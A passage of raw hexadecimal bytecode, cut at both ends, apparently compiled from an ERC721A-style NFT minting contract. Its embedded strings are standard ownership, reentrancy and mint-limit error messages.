0293578063081812fc146102be578063095ea7b3146102fb57806311b01a3214610324575b600080fd5b34801561026257600080fd5b5061027d60048036038101906102789190613705565b6109b7565b60405161028a919061374d565b60405180910390f35b34801561029f57600080fd5b506102a8610b01565b6040516102b591906137f8565b60405180910390f35b3480156102ca57600080fd5b506102e560048036038101906102e09190613850565b610b93565b6040516102f291906138be565b60405180910390f35b34801561030757600080fd5b50610322600480360381019061031d9190613905565b610c18565b005b34801561033057600080fd5b5061034b60048036038101906103469190613945565b610d30565b6040516103589190613981565b60405180910390f35b34801561036d57600080fd5b50610376610d48565b6040516103839190613981565b60405180910390f35b34801561039857600080fd5b506103b360048036038101906103ae919061399c565b610d51565b005b3480156103c157600080fd5b506103dc60048036038101906103d79190613905565b610d61565b6040516103e99190613981565b60405180910390f35b3480156103fe57600080fd5b50610407610f51565b6040516104149190613981565b60405180910390f35b34801561042957600080fd5b50610432610f57565b005b34801561044057600080fd5b5061045b6004803603810190610456919061399c565b611136565b005b34801561046957600080fd5b50610472611156565b60405161047f9190613981565b60405180910390f35b34801561049457600080fd5b506104af60048036038101906104aa9190613850565b61115c565b6040516104bc9190613981565b60405180910390f35b3480156104d157600080fd5b506104da6111af565b6040516104e7919061374d565b60405180910390f35b3480156104fc57600080fd5b5061051760048036038101906105129190613850565b6111c2565b005b34801561052557600080fd5b50610540600480360381019061053b9190613850565b6112a7565b60405161054d91906138be565b60405180910390f35b34801561056257600080fd5b5061056b6112bd565b6040516105789190613981565b60405180910390f35b34801561058d57600080fd5b506105966112c7565b6040516105a391906137f8565b60405180910390f35b3480156105b857600080fd5b506105c1611355565b6040516105ce91906137f8565b60405180910390f35b3480156105e357600080fd5b506105fe60048036038101906105f99190613945565b6113e3565b60405161060b9190613981565b60405180910390f35b34801561062057600080fd5b506106296114cb565b005b34801561063757600080fd5b506106406115b2565b60405161064d91906138be565b60405180910390f35b34801561066257600080fd5b5061067d60048036038101906106789190613850565b6115dc565b005b34801561068b57600080fd5b506106946116c1565b6040516106a191906137f8565b60405180910390f35b3480156106b657600080fd5b506106bf611753565b6040516106cc9190613981565b60405180910390f35b6106ef60048036038101906106ea9190613850565b611759565b005b3480156106fd57600080fd5b5061071860048036038101906107139190613b24565b611dd2565b005b34801561072657600080fd5b50610741600480360381019061073c9190613b99565b611ec0565b005b34801561074f57600080fd5b50610758612040565b6040516107659190613981565b60405180910390f35b34801561077a57600080fd5b5061079560048036038101906107909190613c7a565b61204a565b005b3480156107a357600080fd5b506107ac6120a6565b005b3480156107ba57600080fd5b506107c36121ad565b6040516107d09190613981565b60405180910390f35b3480156107e557600080fd5b5061080060048036038101906107fb9190613850565b6121b3565b60405161080d91906137f8565b60405180910390f35b34801561082257600080fd5b5061082b6122d4565b604051610838919061374d565b60405180910390f35b34801561084d57600080fd5b506108566122e7565b6040516108639190613981565b60405180910390f35b34801561087857600080fd5b506108816122ed565b60405161088e9190613981565b60405180910390f35b3480156108a357600080fd5b506108be60048036038101906108b99190613850565b6122f3565b005b3480156108cc57600080fd5b506108e760048036038101906108e29190613cfd565b6123d8565b6040516108f4919061374d565b60405180910390f35b34801561090957600080fd5b50610924600480360381019061091f9190613945565b61246c565b005b34801561093257600080fd5b5061094d60048036038101906109489190613945565b6125c2565b60405161095a9190613981565b60405180910390f35b34801561096f57600080fd5b506109786125da565b6040516109859190613981565b60405180910390f35b34801561099a57600080fd5b506109b560048036038101906109b09190613b24565b6125e0565b005b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19161480610a8257507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610aea57507f780e9d63000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610afa5750610af9826126f1565b5b9050919050565b606060018054610b1090613d6c565b80601f0160208091040260200160405190810160405280929190818152602001828054610b3c90613d6c565b8015610b895780601f10610b5e57610100808354040283529160200191610b89565b820191906000526020600020905b815481529060010190602001808311610b6c57829003601f168201915b5050505050905090565b6000610b9e8261275b565b610bdd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bd490613e0f565b60405180910390fd5b6005600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b6000610c23826112a7565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c93576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c8a90613ea1565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610cb2612768565b73ffffffffffffffffffffffffffffffffffffffff161480610ce15750610ce081610cdb612768565b6123d8565b5b610d20576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d1790613f33565b60405180910390fd5b610d2b838383612770565b505050565b60166020528060005260406000206000915090505481565b60008054905090565b610d5c838383612822565b505050565b6000610d6c836113e3565b8210610dad576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610da490613fc5565b60405180910390fd5b6000610db7610d48565b905060008060005b83811015610f0f576000600360008381526020019081526020016000206040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff1614610eb157806000015192505b8773ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610f0157868403610ef8578195505050505050610f4b565b83806001019450505b508080600101915050610dbf565b506040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f4290614057565b60405180910390fd5b92915050565b600e5481565b610f5f612768565b73ffffffffffffffffffffffffffffffffffffffff16610f7d6115b2565b73ffffffffffffffffffffffffffffffffffffffff161480610ff35750610fa2612768565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611032576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611029906140c3565b60405180910390fd5b600260095403611077576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161106e9061412f565b60405180910390fd5b600260098190555060003373ffffffffffffffffffffffffffffffffffffffff16476040516110a590614180565b60006040518083038185875af1925050503d80600081146110e2576040519150601f19603f3d011682016040523d82523d6000602084013e6110e7565b606091505b505090508061112b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611122906141e1565b60405180910390fd5b506001600981905550565b6111518383836040518060200160405280600081525061204a565b505050565b600d5481565b6000611166610d48565b82106111a7576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161119e90614273565b60405180910390fd5b819050919050565b601260009054906101000a900460ff1681565b6111ca612768565b73ffffffffffffffffffffffffffffffffffffffff166111e86115b2565b73ffffffffffffffffffffffffffffffffffffffff16148061125e575061120d612768565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b61129d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611294906140c3565b60405180910390fd5b80600e8190555050565b60006112b282612d60565b600001519050919050565b6000600a54905090565b601380546112d490613d6c565b80601f016020809104026020016040519081016040528092919081815260200182805461130090613d6c565b801561134d5780601f106113225761010080835404028352916020019161134d565b820191906000526020600020905b81548152906001019060200180831161133057829003601f168201915b505050505081565b6014805461136290613d6c565b80601f016020809104026020016040519081016040528092919081815260200182805461138e90613d6c565b80156113db5780601f106113b0576101008083540402835291602001916113db565b820191906000526020600020905b8154815290600101906020018083116113be57829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611453576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161144a90614305565b60405180910390fd5b600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a90046fffffffffffffffffffffffffffffffff166fffffffffffffffffffffffffffffffff169050919050565b6114d3612768565b73ffffffffffffffffffffffffffffffffffffffff166114f16115b2565b73ffffffffffffffffffffffffffffffffffffffff1614806115675750611516612768565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6115a6576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161159d906140c3565b60405180910390fd5b6115b06000612efa565b565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6115e4612768565b73ffffffffffffffffffffffffffffffffffffffff166116026115b2565b73ffffffffffffffffffffffffffffffffffffffff1614806116785750611627612768565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6116b7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116ae906140c3565b60405180910390fd5b80600a8190555050565b6060600280546116d090613d6c565b80601f01602080910402602001604051908101604052809291908181526020018280546116fc90613d6c565b80156117495780601f1061171e57610100808354040283529160200191611749565b820191906000526020600020905b81548152906001019060200180831161172c57829003601f168201915b5050505050905090565b600a5481565b6000600a54905060006001600e546117719190614354565b8360115461177f9190614354565b1080156117cc5750600c54601560003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b90508015611b3657601060009054906101000a900460ff16611823576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161181a906143d4565b60405180910390fd5b600f548361182f610d48565b6118399190614354565b111561187a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161187190614440565b60405180910390fd5b600b548311156118bf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118b6906144ac565b60405180910390fd5b601560003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600c5461190c91906144cc565b8310611a285781601560003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600c5461196091906144cc565b61196a9190614500565b82846119769190614500565b61198091906144cc565b3410156119c2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119b99061458e565b60405180910390fd5b600c54601560003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600c5460116000828254611a1c9190614354565b92505081905550611b31565b601560003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600c54611a7591906144cc565b831015611b30576000341015611ac0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ab79061458e565b60405180910390fd5b82601560003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254611b0f9190614354565b925050819055508260116000828254611b289190614354565b925050819055505b5b611d6d565b601060009054906101000a900460ff16611b85576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b7c906143d4565b60405180910390fd5b600d5483601660003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611bd39190614354565b1115611c14576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c0b906145fa565b60405180910390fd5b8183611c209190614500565b341015611c62576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c599061458e565b60405180910390fd5b600f5483611c6e610d48565b611c789190614354565b1115611cb9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611cb090614440565b60405180910390fd5b600b54831115611cfe576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611cf5906144ac565b60405180910390fd5b3273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614611d6c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d6390614666565b60405180910390fd5b5b82601660003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254611dbc9190614354565b92505081905550611dcd3384612fc0565b505050565b611dda612768565b73ffffffffffffffffffffffffffffffffffffffff16611df86115b2565b73ffffffffffffffffffffffffffffffffffffffff161480611e6e5750611e1d612768565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611ead576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ea4906140c3565b60405180910390fd5b8060139081611ebc9190614832565b5050565b611ec8612768565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611f35576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f2c90614950565b60405180910390fd5b8060066000611f42612768565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff16611fef612768565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c3183604051612034919061374d565b60405180910390a35050565b6000600c54905090565b612055848484612822565b61206184848484612fde565b6120a0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612097906149e2565b60405180910390fd5b50505050565b6120ae612768565b73ffffffffffffffffffffffffffffffffffffffff166120cc6115b2565b73ffffffffffffffffffffffffffffffffffffffff16148061214257506120f1612768565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b612181576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612178906140c3565b60405180910390fd5b601060009054906101000a900460ff1615601060006101000a81548160ff021916908315150217905550565b600c5481565b60606121be8261275b565b6121fd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016121f490614a74565b60405180910390fd5b601260009054906101000a900460ff166122a1576014805461221e90613d6c565b80601f016020809104026020016040519081016040528092919081815260200182805461224a90613d6c565b80156122975780601f1061226c57610100808354040283529160200191612297565b820191906000526020600020905b81548152906001019060200180831161227a57829003601f168201915b50505050506122cd565b60136122ac83613165565b6040516020016122bd929190614b9f565b6040516020818303038152906040525b9050919050565b601060009054906101000a900460ff1681565b600f5481565b60115481565b6122fb612768565b73ffffffffffffffffffffffffffffffffffffffff166123196115b2565b73ffffffffffffffffffffffffffffffffffffffff16148061238f575061233e612768565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6123ce576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016123c5906140c3565b60405180910390fd5b80600c8190555050565b6000600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b612474612768565b73ffffffffffffffffffffffffffffffffffffffff166124926115b2565b73ffffffffffffffffffffffffffffffffffffffff16148061250857506124b7612768565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b612547576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161253e906140c3565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036125b6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016125ad90614c40565b60405180910390fd5b6125bf81612efa565b50565b60156020528060005260406000206000915090505481565b600b5481565b6125e8612768565b73ffffffffffffffffffffffffffffffffffffffff166126066115b2565b73ffffffffffffffffffffffffffffffffffffffff16148061267c575061262b612768565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6126bb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016126b2906140c3565b60405180910390fd5b80601490816126ca9190614832565b5050565b6000808273ffffffffffffffffffffffffffffffffffffffff163b119050919050565b60007f01ffc9a7000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916149050919050565b6000805482109050919050565b600033905090565b826005600084815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b600061282d82612d60565b90506000816000015173ffffffffffffffffffffffffffffffffffffffff16612854612768565b73ffffffffffffffffffffffffffffffffffffffff1614806128b05750612879612768565b73ffffffffffffffffffffffffffffffffffffffff1661289884610b93565b73ffffffffffffffffffffffffffffffffffffffff16145b806128cc57506128cb82600001516128c6612768565b6123d8565b5b90508061290e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161290590614cd2565b60405180910390fd5b8473ffffffffffffffffffffffffffffffffffffffff16826000015173ffffffffffffffffffffffffffffffffffffffff1614612980576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161297790614d64565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036129ef576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016129e690614df6565b60405180910390fd5b6129fc85858560016132c5565b612a0c6000848460000151612770565b6001600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a90046fffffffffffffffffffffffffffffffff160392506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff1602179055506001600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a90046fffffffffffffffffffffffffffffffff160192506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff160217905550836003600085815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550426003600085815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055506000600184019050600073ffffffffffffffffffffffffffffffffffffffff166003600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1603612cf057612c4f8161275b565b15612cef5782600001516003600083815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555082602001516003600083815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055505b5b50828473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a4612d5985858560016132cb565b5050505050565b612d6861365f565b612d718261275b565b612db0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612da790614e88565b60405180910390fd5b60008290505b60008110612eb9576000600360008381526020019081526020016000206040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff1614612eaa578092505050612ef5565b50808060019003915050612db6565b506040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612eec90614f1a565b60405180910390fd5b919050565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b612fda8282604051806020016040528060008152506132d1565b5050565b6000612fff8473ffffffffffffffffffffffffffffffffffffffff166126ce565b15613158578373ffffffffffffffffffffffffffffffffffffffff1663150b7a02613028612768565b8786866040518563ffffffff1660e01b815260040161304a9493929190614f8f565b6020604051808303816000875af192505050801561308657506040513d601f19601f820116820180604052508101906130839190614ff0565b60015b613108573d80600081146130b6576040519150601f19603f3d011682016040523d82523d6000602084013e6130bb565b606091505b506000815103613100576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016130f7906149e2565b60405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19161491505061315d565b600190505b949350505050565b6060600082036131ac576040518060400160405280600181526020017f300000000000000000000000000000000000000000000000000000000000000081525090506132c0565b600082905060005b600082146131de5780806131c79061501d565b915050600a826131d79190615094565b91506131b4565b60008167ffffffffffffffff8111156131fa576131f96139f9565b5b6040519080825280601f01601f19166020018201604052801561322c5781602001600182028036833780820191505090505b5090505b600085146132b95760018261324591906144cc565b9150600a8561325491906150c5565b60306132609190614354565b60f81b818381518110613276576132756150f6565b5b60200101907effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916908160001a905350600a856132b29190615094565b9450613230565b8093505050505b919050565b50505050565b50505050565b6132de83838360016132e3565b505050565b600080549050600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1603613358576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161334f90615197565b60405180910390fd5b6000840361339b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161339290615229565b60405180910390fd5b6133a860008683876132c5565b83600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a90046fffffffffffffffffffffffffffffffff160192506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff16021790555083600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160108282829054906101000a90046fffffffffffffffffffffffffffffffff160192506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff160217905550846003600083815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550426003600083815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff160217905550600081905060005b8581101561364257818773ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a4831561362d576135ed6000888488612fde565b61362c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613623906149e2565b60405180910390fd5b5b81806001019250508080600101915050613576565b50806000819055505061365860008683876132cb565b5050505050565b6040518060400160405280600073ffffffffffffffffffffffffffffffffffffffff168152602001600067ffffffffffffffff1681525090565b6000604051905090565b600080fd5b600080fd5b60007fffffffff0000000000000000000000000000000000000000000000000000000082169050919050565b6136e2816136ad565b81146136ed57600080fd5b50565b6000813590506136ff816136d9565b92915050565b60006020828403121561371b5761371a6136a3565b5b6000613729848285016136f0565b91505092915050565b60008115159050919050565b61374781613732565b82525050565b6000602082019050613762600083018461373e565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b838110156137a2578082015181840152602081019050613787565b60008484015250505050565b6000601f19601f8301169050919050565b60006137ca82613768565b6137d48185613773565b93506137e4818560208601613784565b6137ed816137ae565b840191505092915050565b6000602082019050818103600083015261381281846137bf565b905092915050565b6000819050919050565b61382d8161381a565b811461383857600080fd5b50565b60008135905061384a81613824565b92915050565b600060208284031215613866576138656136a3565b5b60006138748482850161383b565b91505092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006138a88261387d565b9050919050565b6138b88161389d565b82525050565b60006020820190506138d360008301846138af565b92915050565b6138e28161389d565b81146138ed57600080fd5b50565b6000813590506138ff816138d9565b92915050565b6000806040838503121561391c5761391b6136a3565b5b600061392a858286016138f0565b925050602061393b8582860161383b565b9150509250929050565b60006020828403121561395b5761395a6136a3565b5b6000613969848285016138f0565b91505092915050565b61397b8161381a565b82525050565b60006020820190506139966000830184613972565b92915050565b6000806000606084860312156139b5576139b46136a3565b5b60006139c3868287016138f0565b93505060206139d4868287016138f0565b92505060406139e58682870161383b565b9150509250925092565b600080fd5b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b613a31826137ae565b810181811067ffffffffffffffff82111715613a5057613a4f6139f9565b5b80604052505050565b6000613a63613699565b9050613a6f8282613a28565b919050565b600067ffffffffffffffff821115613a8f57613a8e6139f9565b5b613a98826137ae565b9050602081019050919050565b82818337600083830152505050565b6000613ac7613ac284613a74565b613a59565b905082815260208101848484011115613ae357613ae26139f4565b5b613aee848285613aa5565b509392505050565b600082601f830112613b0b57613b0a6139ef565b5b8135613b1b848260208601613ab4565b91505092915050565b600060208284031215613b3a57613b396136a3565b5b600082013567ffffffffffffffff811115613b5857613b576136a8565b5b613b6484828501613af6565b91505092915050565b613b7681613732565b8114613b8157600080fd5b50565b600081359050613b9381613b6d565b92915050565b60008060408385031215613bb057613baf6136a3565b5b6000613bbe858286016138f0565b9250506020613bcf85828601613b84565b9150509250929050565b600067ffffffffffffffff821115613bf457613bf36139f9565b5b613bfd826137ae565b9050602081019050919050565b6000613c1d613c1884613bd9565b613a59565b905082815260208101848484011115613c3957613c386139f4565b5b613c44848285613aa5565b509392505050565b600082601f830112613c6157613c606139ef565b5b8135613c71848260208601613c0a565b91505092915050565b60008060008060808587031215613c9457613c936136a3565b5b6000613ca2878288016138f0565b9450506020613cb3878288016138f0565b9350506040613cc48782880161383b565b925050606085013567ffffffffffffffff811115613ce557613ce46136a8565b5b613cf187828801613c4c565b91505092959194509250565b60008060408385031215613d1457613d136136a3565b5b6000613d22858286016138f0565b9250506020613d33858286016138f0565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680613d8457607f821691505b602082108103613d9757613d96613d3d565b5b50919050565b7f455243373231413a20617070726f76656420717565727920666f72206e6f6e6560008201527f78697374656e7420746f6b656e00000000000000000000000000000000000000602082015250565b6000613df9602d83613773565b9150613e0482613d9d565b604082019050919050565b60006020820190508181036000830152613e2881613dec565b9050919050565b7f455243373231413a20617070726f76616c20746f2063757272656e74206f776e60008201527f6572000000000000000000000000000000000000000000000000000000000000602082015250565b6000613e8b602283613773565b9150613e9682613e2f565b604082019050919050565b60006020820190508181036000830152613eba81613e7e565b9050919050565b7f455243373231413a20617070726f76652063616c6c6572206973206e6f74206f60008201527f776e6572206e6f7220617070726f76656420666f7220616c6c00000000000000602082015250565b6000613f1d603983613773565b9150613f2882613ec1565b604082019050919050565b60006020820190508181036000830152613f4c81613f10565b9050919050565b7f455243373231413a206f776e657220696e646578206f7574206f6620626f756e60008201527f6473000000000000000000000000000000000000000000000000000000000000602082015250565b6000613faf602283613773565b9150613fba82613f53565b604082019050919050565b60006020820190508181036000830152613fde81613fa2565b9050919050565b7f455243373231413a20756e61626c6520746f2067657420746f6b656e206f662060008201527f6f776e657220627920696e646578000000000000000000000000000000000000602082015250565b6000614041602e83613773565b915061404c82613fe5565b604082019050919050565b6000602082019050818103600083015261407081614034565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006140ad602083613773565b91506140b882614077565b602082019050919050565b600060208201905081810360008301526140dc816140a0565b9050919050565b7f5265656e7472616e637947756172643a207265656e7472616e742063616c6c00600082015250565b6000614119601f83613773565b9150614124826140e3565b602082019050919050565b600060208201905081810360008301526141488161410c565b9050919050565b600081905092915050565b50565b600061416a60008361414f565b91506141758261415a565b600082019050919050565b600061418b8261415d565b9150819050919050565b7f5472616e73666572206661696c65642e00000000000000000000000000000000600082015250565b60006141cb601083613773565b91506141d682614195565b602082019050919050565b600060208201905081810360008301526141fa816141be565b9050919050565b7f455243373231413a20676c6f62616c20696e646578206f7574206f6620626f7560008201527f6e64730000000000000000000000000000000000000000000000000000000000602082015250565b600061425d602383613773565b915061426882614201565b604082019050919050565b6000602082019050818103600083015261428c81614250565b9050919050565b7f455243373231413a2062616c616e636520717565727920666f7220746865207a60008201527f65726f2061646472657373000000000000000000000000000000000000000000602082015250565b60006142ef602b83613773565b91506142fa82614293565b604082019050919050565b6000602082019050818103600083015261431e816142e2565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061435f8261381a565b915061436a8361381a565b925082820190508082111561438257614381614325565b5b92915050565b7f4d696e74206973206e6f74206c69766520796574000000000000000000000000600082015250565b60006143be601483613773565b91506143c982614388565b602082019050919050565b600060208201905081810360008301526143ed816143b1565b9050919050565b7f4e6f206d6f726500000000000000000000000000000000000000000000000000600082015250565b600061442a600783613773565b9150614435826